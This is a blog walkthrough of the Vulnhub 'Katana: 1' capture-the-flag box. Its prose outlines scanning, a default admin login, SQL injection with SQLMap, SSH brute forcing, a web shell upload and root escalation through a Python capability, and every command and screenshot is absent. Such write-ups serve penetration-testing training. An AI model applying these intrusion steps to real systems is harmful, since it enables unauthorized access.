Vulnhub Katana: 1 Walkthrough

    This box is described as "Intermediate" and the description states:  "Get the root shell i.e.(root@localhost:~#) and then obtain flag under /root)."

    I'll admit, I'm getting a little worn out on the multiple web serving troll ports.  It's basically the same box recycled with a different twist.  That being said, the privilege escalation was excellent.  There are multiple entrances for a low privilege shell and I cover two. 

    We kick off with Nmap:

    Lots of open ports like the previous boxes from this author.  When we search port 80 with Nikto, we find:

    When we access it from the web browser, we find:

    Scrolling down, we find:

    Moving over to the admin page, we try admin admin :

    We're in!  I attempt to upload a shell:

    But that errors out.  When I look in the address, I see what could be SQL Injection:

    Mind you, this is a deviation and it goes nowhere but if you want to play around with it, this is how it starts:

    We capture the post in Burp and we insert it into a file.  We fire up SQLMap:

    We find a database:

    Let's enumerate the database:

    We find a table and we get the column info:

    Let's dump the table:

    And we find what we already know when cracking the hash, the username is admin and the password is admin.

    Circling back -- looking at the format of the pages, I guess that maybe admin_edit.php exists:

    I attempt to upload a shell:

    When I try to add it:

    We get an error. 

    Meanwhile, I'm brute forcing SSH and I find:

    That's our first in, I'm not sure that was intended.  We SSH over to the box:

    As I'm hunting around the various web servers, I find:

    I think this was probably the intended entry:

    We upload our shell:

    Note the location of the file but recognize that it's NOT on this web server, it's the server running on port 8715:

    With our handler setup:

    Getting in as www-data buys us nothing.  Back to katana, I search for files with capabilities and I uncover:

    Which leads us to:

    With Python2.7, we can execute a shell for root.  We get the flag and it's game over!  I really like the privilege escalation, that was solid.  Took me a bit to figure that out because it doesn't show up on privilege escalation scripts -- or at least those I ran.

    © 2020